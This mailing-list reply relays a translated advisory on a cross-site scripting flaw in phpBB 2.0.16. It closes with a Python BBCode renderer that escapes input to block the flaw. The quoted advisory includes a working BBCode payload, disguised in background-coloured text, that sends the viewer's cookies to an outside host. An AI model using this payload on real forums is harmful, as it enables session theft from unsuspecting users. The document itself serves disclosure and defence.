On Wed, Jul 06, 2005 at 11:20:45AM +0200, Moritz Muehlenhoff wrote:
> Hi,
> These advisories on phpbb2 have been posted to Bugtraq. Unfortunately
> they are written in Russian:
> http://www.securitylab.ru/55612.html

Cross-site scripting with phpbb forums

Program: phpbb 2.0.16
Severity: low
Exploit available: yes

Description: a vulnerability in the phpbb forum allows a remote user to carry out an XSS attack. The remote user can insert a specially constructed combination of BB tags into forum messages to cause arbitrary code execution in the browser of a user that views the malicious message. The vulnerability can be used to steal the user's private information (session IDs or cookies).

Sample exploit:

[color=#EFEFEF][url]www.ut[url=www.s='' style='font-size:0;color:#EFEFEF 'style='top:expression(eval(this.sss)); 'sss=`i=new/**/Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie; this.sss=null`style='font-size:0;] [/url][/url]'[/color]

Replace ЦВЕТ_ФОНА (BACKGROUND_COLOR) with the value for the message background used by this forum skin. For the standard subsilver this is #EFEFEF. This is done so that the introduction of the exploit is not noticeable to the naked eye in other browsers where the code doesn't work, yadda yadda.

Author's URL: http://www.phpbb.com

Solution: there is no fix for this vulnerability at present.

Curiously, this seems to be nothing more than a bad copy from the second advisory, since there is obviously no occurrence of ЦВЕТ_ФОНА in the sample exploit provided...

> http://antichat.ru/txt/phpbb/

Neither provides any information about a fix. The second one does go into more detail, but I'd imagine the sample exploit is the important part and the rest is ignorable. If not, Babelfish seems to be a surprisingly usable Russian-English translation dictionary -- I wonder why they can't do this good a job on the other languages. :-)

--
Steve Langasek
postmodern programmer
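The advisory above boils down to a BBCode renderer that copies the `[url=...]` argument into an HTML attribute unescaped, so quotes and a `style=` attribute ride along. The following is an added example, written for this archive page and not phpBB's own code: a small Python renderer for `[url]` and `[color]` that escapes the whole input first, allow-lists the characters and scheme of a link target, and leaves anything it rejects (including nested `[url]` tags) as visible text. The sample input is constructed here and only mimics the attribute-breakout pattern; `render`, `safe_url` and the regex names are this example's own.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample (not the advisory's own string): the [url=...] argument tries to
# close the href attribute and smuggle in a style= attribute, the pattern described above.
SAMPLE = "[color=#EFEFEF][url=www.example.com' style='top:expression(alert(1))']x[/url][/color]"

URL_TAG = re.compile(r"\[url(?:=([^\]]*))?\](.*?)\[/url\]", re.I | re.S)
COLOR_TAG = re.compile(r"\[color=([^\]]*)\](.*?)\[/color\]", re.I | re.S)
COLOR_OK = re.compile(r"^(?:#[0-9a-f]{3}|#[0-9a-f]{6}|[a-z]{1,20})$", re.I)
SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)
URL_CHARS = re.compile(r"^[A-Za-z0-9._~:/?#@!$&()*+,;=%-]+$")  # no quotes, blanks, <, >, `

def safe_url(arg):
    """Return an http(s) URL fit for a double-quoted href, or None if the argument is not one."""
    arg = arg.strip()
    if not SCHEME.match(arg):            # bare host: assume http (host:port without a scheme is rejected)
        arg = "http://" + arg
    if not URL_CHARS.match(arg):
        return None
    parts = urlsplit(arg)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return arg

def render(bbcode):
    """Render [url] and [color] to HTML; anything else is emitted as escaped text."""
    # Escape first, so no quote, < or > from the input can ever reach the markup.
    s = html.escape(bbcode, quote=True)

    def url_repl(m):
        arg, text = m.group(1), m.group(2)
        target = safe_url(arg if arg is not None else text)
        if target is None or "[" in text:   # rejected URL, or a nested tag in the link text
            return m.group(0)               # keep it as visible, already-escaped text
        return '<a href="%s">%s</a>' % (target, text)

    def color_repl(m):
        color = m.group(1).strip()
        if not COLOR_OK.match(color):
            return m.group(0)
        return '<span style="color:%s">%s</span>' % (color, m.group(2))

    return COLOR_TAG.sub(color_repl, URL_TAG.sub(url_repl, s))

if __name__ == "__main__":
    print(render(SAMPLE))
```

Run as a script it prints the sample rendered as a grey span containing the literal, escaped `[url=...]` text, with no `<a>` and no injected attribute.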